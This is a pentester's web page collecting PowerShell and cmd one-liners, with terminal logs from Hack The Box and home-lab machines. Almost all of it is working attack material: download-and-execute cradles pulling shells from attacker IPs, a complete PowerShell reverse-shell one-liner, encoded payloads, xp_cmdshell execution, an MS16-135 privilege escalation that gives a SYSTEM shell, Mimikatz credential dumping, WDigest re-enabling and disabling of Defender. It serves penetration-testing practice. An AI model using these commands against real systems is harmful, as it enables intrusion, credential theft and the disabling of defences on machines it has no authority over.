puckiestyle – pentesting

puckiestyle – ethical hacking

 

For info or a quote, mail us at info@puckiestyle.nl or use the contact form 

whoami : Network / System Engineer , Security specialist from Meppel (NL)

powershell oneliners

PowerShell (any version):

(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.19/shell-443.exe", "C:\FTP\Intranet\shell-443.exe")
PS C:\users\hillie> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/MS14-058.exe", "c:\users\public\MS14-058.exe")
C:\> PowerShell (New-Object System.Net.WebClient).DownloadFile('http://192.168.178.16:8000/launcher.bat’,’launcher.bat'); Start-Process ‘launcher.bat'
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.178.16',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
PS C:\Users\hillie> IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.16/puckieshell443.ps1')
C:\Users\hillie>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=HTB\Administrator
Type: Domain Password
User: HTB\Administrator
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.98 - - [28/Feb/2019 19:38:58] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
c:\Users\Public>certutil -urlcache -split -f http://10.10.14.20/puckieshell443.ps1
PS C:\pentest> certutil.exe -f -split -VerifyCTL http://192.168.178.12/msbuild_nps.xml
CertUtil: -verifyCTL command FAILED: 0x8009310b (ASN: 267 CRYPT_E_ASN1_BADTAG)
CertUtil: ASN1 bad tag value met.

PS C:\pentest> dir *.bin

Directory: C:\pentest

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/7/2019   4:16 PM           5462 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin

PS C:\pentest> mv 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin msbuild_nps.xml

PS C:\pentest> dir *.xml

Directory: C:\pentest

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/7/2019 4:16 PM 5462 msbuild_nps.xml
C:\Users\Public> runas /user:HTB\administrator /savecred "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')"
C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.xx: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.98] 49167: NO_DATA
Windows PowerShell running as user Administrator on HTB
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
HTB\administrator
root@kali:~/htb/access# echo -n "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA=
c:\Users\Public> runas /user:ACCESS\administrator /savecred "powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA="
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.178.13/powercat.ps1');powercat -c 192.168.178.13 -p 1234 -e cmd

Full documentation here.

PowerShell 4.0 & 5.0:

PS C:\Users\hillie> Invoke-WebRequest "http://192.168.178.50/shell-443.exe" -OutFile "C:\FTP\intranet\shell-443.exe"
PS C:\Users\hillie>  
xp_cmdshell "PowerShell IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')
xp_cmdshell "PowerShell IEX(IWR('http://10.10.14.20/puckieshell443.ps1'))"

 

Full documentation here.

c:\inetpub\wwwroot\internal-01\log>powershell
powershell
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

Cannot load PSReadline module. Console is running without PSReadline.
PS C:\inetpub\wwwroot\internal-01\log> $username = 'BART\h.potter'
PS C:\inetpub\wwwroot\internal-01\log> $securePassword = ConvertTo-SecureString -AsPlainText -Force 'Password1'
PS C:\inetpub\wwwroot\internal-01\log> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
PS C:\inetpub\wwwroot\internal-01\log> Enter-PSSession -ComputerName localhost -Credential $credential
[localhost]: PS C:\Users\h.potter\Documents> whoami
bart\h.potter
[localhost]: PS C:\Users\h.potter\Documents> [System.Environment]::Is64BitOperatingSystem
True
[localhost]: PS C:\Users\h.potter\Documents> [System.Environment]::Is64BitProcess
True

PS C:\users> IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.16:8000/Sherlock.ps1')

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
             ample-Exploits/MS16-135
VulnStatus : Appears Vulnerable
PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString(‘http://www.puckiestyle.nl/ps/powerup.ps1‘);Invoke-AllChecks"
PS C:\Users\hillie>(new-object net.webclient).downloadfile('http://10.10.14.20/powerup.ps1', 'C:\users\mssql-svc\appdata\local\temp\powerup.ps1')
PS C:\users\mssql-svc\appdata\local\temp> import-module ./powerup.ps1
   [*] Running Invoke-AllChecks

PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/invoke-mimikatz.ps1');Invoke-Mimikatz"
PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/powerview.ps1');Get-IPAddress"                    PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/windowsenum.ps1')"                                       PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/jaws.ps1')"

Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.50/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.78.50 -Lport 4444

PS C:\users\hillie> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/MS14-058.exe", "c:\users\public\MS14-058.exe")

d:\PENTEST\impacket-examples-windows-master>psexec puckiestyle.local/administrator@192.168.178.200
PS D:\PENTEST\impacket-examples-windows-master> Connect-PSSession -ComputerName 192.168.178.200 -Credential administrator

C:\WINDOWS\system32>psexec.exe \\192.168.178.200 -u puckiestyle\puck -p p@ssw0rd cmd.exe

wmic /NODE:”DC01″ /USER:”puckiestyle\administrator” OS GET Name

wmic /node:192.168.23.214 NIC get description,macaddress

wmic /USER:”puckiestyle\puck” /PASSWORD:”p@ssw0rd” /NODE:192.168.178.200 process call create “powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.178.50/Invoke-Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt”

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

rundll32.exe user32.dll,LockWorkStation

root@kali# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=443 -f exe -o mrshell-p443.exe
root@kali# msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.14.20; set lport 443; set ExitOnSession false; exploit -j"
PS C:\WINDOWS\system32> Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\WINDOWS\system32> Set-MpPreference -DisableIOAVProtection $true
change claire password to Password!
Powershell Set-ADAccountPassword -Reset -NewPassword (ConvertTo-SecureString -String 'Password1!' -AsPlainText -Force) -Identity Claire

Login as Claire and Grant Tom access to Backup_Admins
Powershell Add-ADGroupmember -Identity Backup_Admins -Members tom

Want to add a brand new executable extension (also callable from a .bat)?

C:\Users\jacco>set PATHEXT=%PATHEXT%;.puck
C:\Users\jacco>set pathext
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.puck

Want to know Applocker status from a cmd shell?

powershell -nop -c "import-module applocker; get-command *applocker*"
powershell -nop -c "import-module applocker; Get-AppLockerPolicy -Effective -Xml"

Set TrustedHosts with PowerShell (as Admin)

Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value "Computer1,Computer2"

And check (don’t need Admin for that)

Get-Item WSMan:\localhost\Client\TrustedHosts
c:\users\public\powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')
root@kali:~/htb/optimum# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [09/Apr/2019 10:06:51] "GET /puckieshell53.ps1 HTTP/1.1" 200 -
root@kali:~/htb/optimum# nc -lvp 53
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53
Ncat: Connection from 10.10.10.8.
Ncat: Connection from 10.10.10.8:49541.
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop> [System.Environment]::Is64BitOperatingSystem
True
PS C:\Users\kostas\Desktop> [System.Environment]::Is64BitProcess
True
.
PS C:\users> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/Invoke-MS16135.ps1", "c:\users\public\Invoke-MS16135.ps1")
PS C:\users\public> import-module ./Invoke-MS16135.ps1 
PS C:\users\public> Invoke-MS16135 -Command "IEX(New-Object Net.WebClient).DownloadString('http://192.168.178.16/puckieshell53.ps1')"
_____ _____ ___ ___ ___ ___ ___ 
| | __|_ | | _|___|_ | |_ | _|
| | | |__ |_| |_| . |___|_| |_|_ |_ |
|_|_|_|_____|_____|___| |_____|___|___|

[by b33f -> @FuzzySec]


[!] Success, spawning a system shell! 

root@kali:~/htb# nc -lvp 53
listening on [any] 53 ...
192.168.178.11: inverse host lookup failed: Unknown host
connect to [192.168.178.16] from (UNKNOWN) [192.168.178.11] 49238
Windows PowerShell running as user hillie on HILLIE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\users\public>whoami
nt authority\system
PS C:\users\public>
If you ever need to enable RDP (mstsc) on a Windows 10 machine, and you can’t get to the System control panel item, use Powershell to enable RDP:

If you ever need to enable RDP (mstsc) on a Windows 10 machine, and you can’t get to the System control panel item, use Powershell to enable RDP:

Execute aboves cmdlets as Administrator in Powershell, and RDP should work.

To test the connection, open Powershell on another machine, and run:

PS C:\Users\jacco> Test-NetConnection 10.10.10.97 -CommonTCPPort rdp


ComputerName : 10.10.10.97
RemoteAddress : 10.10.10.97
RemotePort : 3389
InterfaceAlias : Ethernet 2
SourceAddress : 10.10.14.12
TcpTestSucceeded : True

PS C:\Users\jacco>
PS C:\Users\jacco> [Convert]::ToBase64String([IO.File]::ReadAllBytes( "C:\PENTEST\secret.txt"))
ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr
PS C:\Users\jacco>
PS C:\pentest> [IO.File]::WriteAllBytes( "c:\pentest\new.txt" ,[Convert]::FromBase64String( "ZGl0IGJlc3RhbmQgaXMgZ2VoZWl
tDQpncm9ldGplcyBQdWNr"))
PS C:\pentest> type new.txt
dit bestand is geheim
groetjes Puck
# Description: 
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

# PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks”

# Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y  –Proxy Y -LogOutput Y -FileOutput Y"

# Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

# Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

# Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

# Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

# Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)

# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe

# Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1
(c)2022